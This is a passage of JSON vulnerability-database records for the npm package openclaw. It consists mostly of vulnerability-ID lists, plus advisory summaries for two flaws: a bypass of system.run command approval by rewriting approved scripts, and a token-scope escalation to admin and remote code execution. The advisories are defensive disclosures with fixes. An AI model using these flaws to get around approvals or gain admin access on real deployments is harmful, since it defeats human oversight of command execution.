nerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-34425","GHSA-fvx6-pj3r-5q4q"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-y7sd-j9xn-qffs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91609?format=json","vulnerability_id":"VCID-y8jc-h9ft-auge","summary":"Duplicate Advisory: OpenClaw: Unrecognized script runners could bypass `system.run` approval integrity\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-qc36-x95h-7j53. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.11 contains an approval integrity vulnerability where system.run approvals fail to bind mutable file operands for certain script runners like tsx and jiti. Attackers can obtain approval for benign script commands, rewrite referenced scripts on disk, and execute modified code under the approved run context.","references":[{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qc36-x95h-7j53","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qc36-x95h-7j53"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32978","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32978"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-unrecognized-script-runners","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-unrecognized-script-runners"},{"reference_url":"https://github.com/advisories/GHSA-rwwx-25m7-ww73","reference_id":"GHSA-rwwx-25m7-ww73","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rwwx-25m7-ww73"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["GHSA-rwwx-25m7-ww73"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-y8jc-h9ft-auge"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91133?format=json","vulnerability_id":"VCID-ycse-95bv-7ua9","summary":"OpenClaw: Pairing-scoped device tokens could mint `operator.admin` and reach node RCE\n## Summary\nIn affected versions of `openclaw`, a caller holding only `operator.pairing` could use `device.token.rotate` to mint a new token with broader scopes for an already paired device. If the target device was approved for `operator.admin`, the attacker could obtain an administrative token without already holding administrative scope.\n\n## Impact\nThis is a critical authorization flaw. On deployments with connected node hosts or companion apps that expose `system.run`, the escalated token could then modify node execution approvals and reach real remote code execution on the node. Even without nodes, the flaw still granted unauthorized gateway-admin access.\n\n## Affected Packages and Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.3.8`\n- Fixed in: `2026.3.11`\n\n## Technical Details\n`device.token.rotate` accepted caller-supplied target scopes and validated them against the target device's approved scopes, but it did not constrain the newly minted scopes to the caller's own current scope set. That allowed a pairing-scoped caller to mint a broader token for an already paired administrative device.\n\n## Fix\nOpenClaw now enforces caller-scope subsetting in `device.token.rotate`, preventing callers from minting device tokens broader than the scopes they already hold. The fix shipped in `openclaw@2026.3.11`.\n\n## Workarounds\nUpgrade to `2026.3.11` or later.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4jpw-hj22-2xmc","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4jpw-hj22-2xmc"},{"reference_url":"https://github.com/advisories/GHSA-4jpw-hj22-2xmc","reference_id":"GHSA-4jpw-hj22-2xmc","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4jpw-hj22-2xmc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerab